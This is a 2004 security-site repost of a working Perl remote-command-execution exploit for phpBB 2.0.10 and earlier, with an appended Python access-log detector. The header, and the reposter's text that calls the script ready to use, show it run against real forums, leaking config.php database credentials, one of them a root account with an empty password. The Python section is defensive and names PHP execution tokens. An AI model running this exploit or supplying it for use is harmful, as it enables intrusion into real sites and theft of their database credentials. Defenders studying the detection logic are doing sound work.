phpBB <= 2.0.10 vulnerability notes
Source: www.vfocus.net  Author: vfocus  Published: 2004-12-24


#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/...07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## ****ing lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket> )
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###


The code is above; save it as 1.pl and it is ready to use.

After testing several phpBB versions, I found that it does not work against modified versions of phpBB, nor against versions below 2.0.6; the lowest version I tested was 2.0.4.
The good news is that it really can dump the MySQL account; I registered one ID on each forum I tested and then used it.
The bad news is that the ones I dumped were all
$dbms = 'mysql';
$dbhost = 'localhost';

Of course that does not mean there is nothing exploitable; good luck, everyone.
C:\>2.pl forum.chinavisual.com / 113878 "ls -la"
*** CMD: [ ls -la ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aca
总用量 2364
drwxr-xr-x 16 33 33 4096 11月 22 22:48 .
drwxr-xr-x 6 root root 4096 10月 4 13:28 ..
drwxr-xr-x 2 33 33 4096 10月 9 15:52 admin
drwxr-xr-x 3 root root 4096 10月 5 00:51 attach_mod
-rw-r--r-- 1 root root 4379 10月 4 22:20 attach_rules.php
drwxrwxrwx 2 33 33 4096 11月 11 21:21 cache
-rw-r--r-- 1 root root 19689 10月 5 23:14 cash.php
-rw-r--r-- 1 33 33 5961 10月 5 01:26 common.php
-rw-rw-rw- 1 33 33 248 10月 4 14:00 config.php
drwxr-xr-x 2 33 33 4096 7月 17 23:58 db
drwxrwxrwx 7 root root 4096 10月 4 21:01 dbadmin
drwxr-xr-x 2 33 33 4096 10月 5 02:15 docs
-rw-r--r-- 1 root root 12250 10月 4 22:20 download.php
-rw-r--r-- 1 33 33 810 7月 17 23:58 extension.inc
-rw-r--r-- 1 33 33 3675 10月 4 22:25 faq.php
drwxr-xr-x 2 apache apache 1835008 11月 24 19:11 files
-rw-r--r-- 1 33 33 45641 7月 17 23:58 groupcp.php
drwxrwxr-x 5 apache root 8192 10月 5 00:23 image
drwxr-xr-x 8 apache 33 4096 10月 9 17:28 images
drwxr-xr-x 2 33 33 4096 11月 23 00:49 includes
-rw-r--r-- 1 33 33 14737 10月 5 15:57 index.php
drwxr-xr-x 6 33 33 4096 10月 5 15:55 language
-rw-r--r-- 1 33 33 7479 7月 17 23:58 login.php
-rwx------ 1 root root 4553 10月 5 01:17 logo_phpBB.gif
-rw-r--r-- 1 33 33 12529 10月 5 01:29 memberlist.php
-rw-r--r-- 1 33 33 38572 10月 6 00:07 modcp.php
drwxr-xr-x 3 root root 4096 10月 26 15:12 mods
-rw-r--r-- 1 root root 1592 2002-05-31 news.php
-rwxr-xr-x 1 root root 3782 11月 10 15:36 phpBB2_yeesoft.zip
-rw-r--r-- 1 33 33 37059 10月 6 01:31 posting.php
-rw-r--r-- 1 33 33 73194 10月 5 01:35 privmsg.php
-rw------- 1 root root 32768 10月 4 22:28 .privmsg.php.swp
-rw-r--r-- 1 33 33 3985 10月 5 01:36 profile.php
-rw-r--r-- 1 root root 5889 10月 8 13:58 quick_reply.php
-rw-r--r-- 1 33 33 42692 7月 17 23:58 search.php
drwxr-xr-x 3 root root 4096 11月 22 23:25 syn
drwxr-xr-x 3 33 33 4096 10月 5 15:55 templates
-rw-r--r-- 1 root root 15118 10月 4 22:20 uacp.php
-rw-r--r-- 1 33 33 23296 10月 4 23:18 viewforum.php
-rw-r--r-- 1 33 33 7235 10月 5 02:03 viewonline.php
-rw-r--r-- 1 33 33 45633 10月 8 13:54 viewtopic.php

6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C:\>2.pl forum.chinavisual.com / 113878 "config.php"
*** CMD: [ config.php ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C:\>2.pl forum.chinavisual.com / 113878 "cat config.php"
*** CMD: [ cat config.php ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

f8
<?php


// phpBB 2.x auto-generated config file
// Do not change anything in this file!

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'forum2';
$dbuser = 'root';
$dbpasswd = '';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

?>
6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
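The following is an added detection example written for this page; it is not part of the original post or of the RusH script. The request built by the script above relies on double URL encoding: it sends the quote as %2527, so the web server's decode leaves %27, and the second urldecode() that phpBB 2.0.10's viewtopic.php applied to the highlight parameter turned that into a real quote inside code that was then evaluated. A defender can pick this pattern out of a web-server access log by decoding the highlight value twice and checking two things: whether an encoded quote survives the first decode, and whether the fully decoded value contains PHP execution tokens (passthru and $HTTP_GET_VARS are the two the script on this page uses). A legitimate search term with a single-encoded apostrophe is not flagged. The function names (parse_log_line, analyse_target, scan_log), the token list and the log lines are this example's own; the log lines use 203.0.113.x documentation addresses and are constructed, with the exploit line carrying the exact highlight payload from the script above. Two things to note when reading the output earlier on this page: the stray hexadecimal lines such as aca, f8 and 6 are HTTP/1.1 chunked-encoding chunk sizes, printed because the script requests HTTP/1.1 but echoes raw socket lines without parsing the response (f8 is 248, the size of config.php in the directory listing), and the same request pattern is what the check below looks for.

```python
"""Access-log check for the phpBB <= 2.0.10 viewtopic.php 'highlight' injection.

Added example for this page (not part of the original post or the RusH script).
Names such as analyse_target() and scan_log() are this example's own; the log
lines below are constructed sample data using 203.0.113.0/24 documentation
addresses.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# One "combined"-style access-log line: client, identd, user, [time], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens that never belong in a search-highlight word once the value is fully decoded.
# (passthru and $HTTP_GET_VARS are the ones the script on this page uses.)
SUSPICIOUS_TOKENS = (
    "passthru", "system(", "exec(", "shell_exec", "popen(", "eval(",
    "$http_get_vars", "$_get", "$_request",
)

# Constructed sample log: a normal search-highlight request, the exploit pattern
# from this page (running "ls"), and an unrelated request.
LOG_LINES = [
    '203.0.113.5 - - [24/Dec/2004:10:15:01 +0800] '
    '"GET /phpBB/viewtopic.php?t=239819&highlight=phpbb HTTP/1.1" 200 18322',
    '203.0.113.7 - - [24/Dec/2004:10:16:44 +0800] '
    '"GET /phpBB/viewtopic.php?t=239819'
    '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%6C%73%3B%20%65%63%68%6F%20%5F%45%4E%44%5F'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'
    ' HTTP/1.1" 200 2762',
    '203.0.113.9 - - [24/Dec/2004:10:17:02 +0800] '
    '"GET /phpBB/viewforum.php?f=3 HTTP/1.1" 200 9000',
]


def parse_log_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse_target(target):
    """Judge one request target (path plus query string).

    Returns {'suspicious': bool, 'reasons': [str], 'highlight': str | None},
    where 'highlight' is the parameter after a second URL decode, mirroring
    the extra urldecode() the vulnerable viewtopic.php applied.
    """
    parts = urlsplit(target)
    verdict = {"suspicious": False, "reasons": [], "highlight": None}
    if not parts.path.lower().endswith("viewtopic.php"):
        return verdict
    params = parse_qs(parts.query, keep_blank_values=True)  # first decode happens here
    once = params.get("highlight", [None])[0]
    if once is None:
        return verdict
    # A quote that is still percent-encoded after one decode is the double-encoding trick:
    # %2527 -> %27 -> ' only becomes a quote on the second decode.
    if re.search(r"%(27|22)", once, re.IGNORECASE):
        verdict["reasons"].append(
            "highlight still holds an encoded quote after one decode (double encoding)")
    twice = unquote(once)
    verdict["highlight"] = twice
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in twice.lower()]
    if hits:
        verdict["reasons"].append("highlight carries PHP execution tokens: " + ", ".join(hits))
    verdict["suspicious"] = bool(verdict["reasons"])
    return verdict


def scan_log(lines):
    """Return one finding per suspicious request, with the client IP and the decoded highlight."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        verdict = analyse_target(rec["target"])
        if verdict["suspicious"]:
            findings.append({"ip": rec["ip"], "target": rec["target"],
                             "highlight": verdict["highlight"], "reasons": verdict["reasons"]})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding["ip"], "->", finding["highlight"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

Run against the constructed log, only the second line is reported, with the decoded highlight shown as '.passthru($HTTP_GET_VARS[rush]).' and both reasons listed. The double-decode check is the more general of the two: it catches any attempt to smuggle a quote past one round of decoding, whatever function name follows it, while the token list only catches the known payload shapes. On a real deployment the same checks apply to the rewritten or proxied request line, and the fix that removes the root cause is upgrading past phpBB 2.0.10 rather than filtering alone.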
